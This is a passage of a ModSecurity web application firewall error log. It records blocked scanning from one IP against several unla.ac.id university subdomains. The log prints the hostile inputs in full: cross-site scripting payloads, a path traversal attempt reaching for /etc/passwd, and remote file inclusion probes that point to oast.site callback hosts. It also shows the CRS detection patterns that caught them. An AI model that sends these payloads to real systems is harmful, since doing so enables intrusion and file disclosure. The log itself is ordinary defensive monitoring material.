"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAocypIAAAAR"]
[Tue Aug 29 11:57:18.599382 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAnEqcIAAAAO"]
[Tue Aug 29 11:57:18.651449 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArfAWoAAAAP"]
[Tue Aug 29 11:57:18.714810 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0cad5w8b4e53gj.oast.site found within TX:1: cjmnijtjmimvgniikdb0cad5w8b4e53gj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArfAWwAAAAP"]
[Tue Aug 29 11:57:18.716015 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAoz8dEAAAAS"]
[Tue Aug 29 11:57:18.717417 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb04unsuxrs1so9c.oast.site found within TX:1: cjmnijtjmimvgniikdb04unsuxrs1so9c.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAocypUAAAAR"]
[Tue Aug 29 11:57:18.771473 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0j7nfprcsmcdfn.oast.site found within TX:1: cjmnijtjmimvgniikdb0j7nfprcsmcdfn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArLLhcAAAAb"]
[Tue Aug 29 11:57:18.794191 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0yc5erukhgjhir.oast.site found within TX:1: cjmnijtjmimvgniikdb0yc5erukhgjhir.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAq5@jIAAAAK"]
[Tue Aug 29 11:57:18.795139 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAm80YoAAAAF"]
[Tue Aug 29 11:57:19.541534 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArdQhUAAAAI"]
[Tue Aug 29 11:57:19.600165 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAocypsAAAAR"]
[Tue Aug 29 11:57:19.612822 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAm80Y4AAAAF"]
[Tue Aug 29 11:57:19.638375 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArfAXIAAAAP"]
[Tue Aug 29 11:57:20.073068 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0yyxasaqkw5hc8.oast.site found within TX:1: cjmnijtjmimvgniikdb0yyxasaqkw5hc8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16sMCo-f0AAArbWY4AAAAG"]
[Tue Aug 29 11:57:20.583039 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16sMCo-f0AAAocyp8AAAAR"]
[Tue Aug 29 11:57:20.729438 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16sMCo-f0AAAqqtvYAAAAA"]
[Tue Aug 29 11:57:22.043950 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16ssCo-f0AAAm80aQAAAAF"]
[Tue Aug 29 11:57:23.535160 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArfAY0AAAAP"]
[Tue Aug 29 11:57:23.587844 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAq@spUAAAAM"]
[Tue Aug 29 11:57:23.594803 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArbWaMAAAAG"]
[Tue Aug 29 11:57:23.596597 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAoz8e4AAAAS"]
[Tue Aug 29 11:57:23.596735 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAnEqdgAAAAO"]
[Tue Aug 29 11:57:24.905290 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16tMCo-f0AAArdQjMAAAAI"]
[Tue Aug 29 11:57:25.729844 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tcCo-f0AAAm80bMAAAAF"]
[Tue Aug 29 11:57:25.848264 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tcCo-f0AAAqsWEAAAAAB"]
[Tue Aug 29 11:57:25.849607 2023] [:error] [pid 2784] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tcCo-f0AAArgDvwAAAAE"]
[Tue Aug 29 11:57:25.905093 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tcCo-f0AAAm80bQAAAAF"]
[Tue Aug 29 11:57:26.159938 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAoz8f4AAAAS"]
[Tue Aug 29 11:57:26.160400 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAqsWEIAAAAB"]
